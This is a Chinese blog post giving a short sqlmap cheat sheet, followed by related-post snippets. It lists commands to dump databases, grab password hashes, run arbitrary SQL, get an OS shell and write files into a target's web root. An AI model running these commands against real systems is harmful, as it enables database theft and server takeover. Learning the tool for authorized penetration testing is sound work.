sqlmap使用

最新推荐文章于 2023-06-29 19:33:09 发布
最新推荐文章于 2023-06-29 19:33:09 发布
阅读量190 收藏
点赞数
分类专栏: sql注入 文章标签: sql web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Likhaooo/article/details/123956849
版权

文章目录

sqlmap介绍

sqlmap是一款自动化得sql注入工具,主要功能扫描判断是否存在sql注入漏洞,发现并利用给定得url得sql注入漏洞

get注入

sqlmap.py -u “url” 检测
sqlmap.py -u “url” --dbs 爆出数据库名
sqlmap.py -u “url” --tables -D “数据库名” 爆表
sqlmap.py -u “url” --columns -T “表名” -D “数据库名” 爆字段
sqlmap.py -u “url” --dump -T “表名” -D “数据库名” -C “字段名” 爆出里面的内容

检测级别

–level 测试等级(1-5),默认为1

属性头注入

–referer sqlmap可以在请求中伪造HTTP中的referer,当–level参数设定为3或3以上的时候会尝试对referer注入
–headers

sqlmap*优先指定检测注入

执行命令

sqlmap.py -u “url” --os-shell#系统交互shell
sqlmap.py -u “url” --os-cmd=ipconfig

自定义请求包注入

-r 参数

注入的选择

参数:–technique
这个参数可以指定sqlmap使用的探测技术,默认情况下会测试所有的方式。

支持的探测方式如下:

B: Boolean-based blind SQL injection(布尔型注入)
E: Error-based SQL injection(报错型注入)
U: UNION query SQL injection(可联合查询注入)
S: Stacked queries SQL injection(可语句查询注入)
T: Time-based blind SQL injection(基于多时间延迟注入)

其他

–proxy “http://127.0.0.1:8080″ #代理
–threads    #采用多线程(–threads 3)
–sql-query #执行指定的sql语句(–sql-query “SELECT password FROM mysql.user WHERE user = ‘root’ LIMIT 0, 1″ )
–file-read #读取指定文件
–file-write #写入本地文件(–file-write /test/test.txt –file-dest /var/www/html/1.txt;将本地的test.txt文件写入到目标的1.txt)
–dbms #指定数据库(MySQL,Oracle,PostgreSQL,Microsoft SQL Server,Microsoft Access,SQLite,Firebird,Sybase,SAP MaxDB)

練家子
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Sqlmap使用手册中文版
01-13
Sqlmap使用手册中文版 Sqlmap是十分著名的、自动化的SQL注入工具。 sqlmap简介 sqlmap支持五种不同的注入模式: 基于布尔的盲注 基于时间的盲注 基于报错注入 联合查询注入 堆叠注入 Sqlmap是开源的自动化SQL注入工具,由Python写成,具有如下特点: 完全支持MySQL、Oracle、PostgreSQL、Microsoft SQL Server、Microsoft Access、IBM DB2、SQLite、Firebird、Sybase、SAP MaxDB、HSQLDB和Informix等多种数据库管理系统。 完全支持布尔型盲注、时间型盲注、基于错误信息的注入、联合查询注入和堆查询注入。 在数据库证书、IP地址、端口和数据库名等条件允许的情况下支持不通过SQL注入点而直接连接数据库。 支持枚举用户、密码、哈希、权限、角色、数据库、数据表和列。 支持自动识别密码哈希格式并通过字典破解密码哈希。 支持完全地下载某个数据库中的某个表,也可以只下载某
sqlmap使用手记
06-01
sqlmap使用手记sqlmap使用手记sqlmap使用手记sqlmap使用手记sqlmap使用手记
SQLMAP使用笔记.pdf
01-25
SQLMAP使用笔记
sqlmap使用说明.pptx
04-02
介绍了 渗透测试工具 sqlmap使用方法。 对sqlmap -tamper 脚本的使用进行了演示。 burpsuite中sqlmap的插件进行了简单的介绍。
sqlmap使用介绍
06-22
详细分析了sqlmap工作原理,指令使用方法,并给出常用示例
sqlmap.py 脚本 sqlmap-master.zip
10-16
sqlmap的脚本,解压后可直接运行 列几个基本命令 ./sqlmap.py –h //查看帮助信息 ./sqlmap.py –u “http://www.anti-x.net/inject.asp?id=injecthere” //get注入 ./sqlmap.py –u “http://www.anti-x.net/inject.asp?id=injecthere” --data “DATA”//post注入 ./sqlmap.py –u “http://www.anti-x.net/inject.asp?id=injecthere” --cookie “COOKIE”//修改请求时的cookie ./sqlmap.py –u “http://www.anti-x.net/inject.asp?id=injecthere” --dbs //列数据库 ./sqlmap.py –u “http://www.anti-x.net/inject.asp?id=injecthere” –-users //列用户 ./sqlmap.py –u “http://www.anti-x.net/inject.asp?id=injecthere” –-passwords //获取密码hash ./sqlmap.py –u “http://www.anti-x.net/inject.asp?id=injecthere” –-tables -D DB_NAME //列DB_NAME的表 ./sqlmap.py –u “http://www.anti-x.net/inject.asp?id=injecthere” –-columns –T TB_NAME -D DB_NAME //读取TB_NAME中的列 ./sqlmap.py –u “http://www.anti-x.net/inject.asp?id=injecthere” –-dump –C C1,C2,C3 –T TB_NAME -D DB_NAME //读字段C1,C2,C3数据 ./sqlmap.py –u “http://www.anti-x.net/inject.asp?id=injecthere” –-os-shell //取得一个shell
iBATIS SQL Maps入门教程
大树下那片阴凉
10-28 1179
iBATIS SQL Maps入门教程准备使用SQL MapSQL Map架构能应用于设计不好的数据库模型甚至是设计不好的对象模型。尽管如此,您在设计数据库模型和对象模型时,还是应该遵循最佳的设计原则。这样,您会获得更好的性能和更简洁清晰的设计方案。设计最容易开始的地方是分析应用的业务逻辑。分析什么是应用的业务对象,什么是数据模型以及两者之间的关系。作为快速入门第一个例子,我们使用一个简单的J
iBATIS SQL Maps(一)
疯猫
11-17 762
前段时间写了些 Hibernate 方面的系列文章,网友们反映还不错。在接下来的时间里,我将会引入另外一种 O/R Mapping 解决方案——iBATIS,本系列将沿用 Hibernate 系列文章的风格。什么是 iBATIS ?     和众多的 SourceForge 开源项目一样,iBATIS 曾经也是其中的一员。在2004年11月3日成功地成为了 Apache Incubator
SQLMAP工具详解
weixin_56218159的博客
06-02 2918
免责声明 该文章仅用于信息防御技术的交流和学习,请勿用于其他用途; 在未得到网站授权前提下,禁止对政府、事业单位、企业或其他单位网站及系统进行渗透测试;技术是把双刃剑,请遵纪守法,做一名合格的白帽子安全专家,为国家的网络安全事业做出贡献; ...
使用SQLMaps 进行对象关系映射
wangqiaowqo的专栏
12-11 185
随着Hibernate逐渐成为其他架构之首,现今的许多工作都是在对象关系(OR)映射域上进行。但是,那些对象关系映射工具有一个问题:大部分数据库管理员似乎对这些对象关系(OR)映射工具所产生的查询不放心。不幸的是,这些数据库管理员不了解,架构所产生的查询是多么的优越,并且使你的应用程序更加灵活。他们觉得随着数据库成为应用程序的主要瓶颈,应该完全控制SQL查询,以便他们能分析和调试以促进性能。  ...
sqlmap进行SQL注入
weixin_45095113的博客
03-16 504
sqlmap跑SQL注入
sqlmap的基础使用
weixin_57478708的博客
02-04 472
有关sqlmap的一些相关基础知识
SQLMAP深入分析-使用篇(基础使用、进阶命令、tamper脚本)
Love&Share
12-29 2万+
文章目录使用篇基础命令进阶命令输出信息的详细程度目标指定连接时信息指定注入参数指定检测级别指定注入类型枚举信息用例指定数据包注入伪静态注入暴力破解文件操作执行命令UDF提权有状态带外连接:Meterpreter & friends访问 Windows 注册表常规选项Tamper脚本tamper 适用的数据库类型 & 版本自带tamper介绍代码分析攻防 学安全的都知道这个注入神器 Sqlmap,也正是这些神器的出现,我们逐渐变成了“脚本小子”,要想变成大佬,就要求不仅会用还会写,在面试中也.
sqlmap执行POST注入的两种方式
good good study
07-08 1万+
我们都知道在web中进行数据传参用的最多的就是GET型或者POST型方法,所以根据此我们也可以把注入分为GET型注入和POST型注入 GET型:http://192.168.80.146/2_Shotting_Range/sql/Less-1/?id=1 通过在可见的URL中进行传参 POST型:与数据库交互是通过post数据进行,url不可见 post型注入例子 有两种方法,一种是-r的方式,另一种是--data 1. sqlmap -r 如下获取到post的数据,在我们可能认为存在注..
使用SQLMaps进行对象关系映射
cqwf95925的博客
06-23 270
引论随着Hibernate逐渐成为其他架构之首,现今的许多工作都是在对象关系(OR)映射域上进行。但是,那些对象关系映射工具有一个问题:大部分数据库管理员似乎对这些对象关系(OR)映射工具所产生的查询不放心。不幸的是,这些数据库...
SQLMaps 的基本思想
weixin_30670965的博客
03-07 198
SQLMaps 的基本思想使用 SQLMaps 架构,你必须建立一个XML文件列出所有你希望在应用程序中执行的SQL查询。对于每个SQL查询,你来指定哪个java类可以交换参数和ResultSet(结果集)。在你的java代码中,如果你想要执行一个特殊的查询,你需要创建一个对象来传递查询参数和必要的条件,然后传递这个对象和查询的名字让 SQLMaps 执行。一旦查询被执行,SQLMaps 将为你指...
sqlmap超详细讲解
热门推荐
A485860941的博客
04-13 3万+
sqlmap超详细讲解,不看后悔一辈子,据说百分之99的人看了都夸赞.
SQLMAP
weixin_61899124的博客
06-29 280
SQLMAP是一款由Python开发的自动化SQL注入工具,其主要功能是扫描、发现并利用SQL注入漏洞,它内置了很多绕过插件,并且支持多种数据库,如MySQL、Oracle、PostgreSQL、SQL Server、Access、IBM DB2、SQLite等数据库;
sqlmap入门-爆库,爆表,列,字段
weixin_46626737的博客
11-14 6828
①当判断a为get注入点后(get) 可使用python sqlmap.py -u "url?a=1" --dbs爆数据库 假设结果中有member数据库 ②爆表 python sqlmap.py -u "url?a=1" --tables -D member 假设有表student ③爆列 python sqlmap.py -u "url?a=1" --column -T student -D member 假设有列id,password,stasus等列 ④爆字段 python sq
sqlmap 使用指令
最新发布
09-22
sqlmap 是一款常用的自动化 SQL 注入工具,它可以帮助检测和利用 SQL 注入漏洞。下面是一些常用的 sqlmap 使用指令: 1. 扫描目标网站是否存在 SQL 注入漏洞: `python sqlmap.py -u <URL>` 例如:`python sqlmap.py -u http://www.example.com/index.php?id=1` 2. 检测目标网站是否存在 SQL 注入漏洞,并获取数据库类型: `python sqlmap.py -u <URL> --dbs` 例如:`python sqlmap.py -u http://www.example.com/index.php?id=1 --dbs` 3. 指定目标数据库进行注入测试: `python sqlmap.py -u <URL> --dbms <database>` 例如:`python sqlmap.py -u http://www.example.com/index.php?id=1 --dbms mysql` 4. 指定目标注入点进行注入测试: `python sqlmap.py -u <URL> --dbms <database> --level <level> --risk <risk>` 例如:`python sqlmap.py -u http://www.example.com/index.php?id=1 --dbms mysql --level 2 --risk 3` 5. 获取目标数据库的所有表: `python sqlmap.py -u <URL> --dbms <database> -D <database_name> --tables` 例如:`python sqlmap.py -u http://www.example.com/index.php?id=1 --dbms mysql -D database_name --tables` 这只是 sqlmap 的一些基本指令,实际使用中还有更多高级功能和选项可供选择。在使用 sqlmap 时,你需要确保已经获得了授权来测试目标网站。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

練家子

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值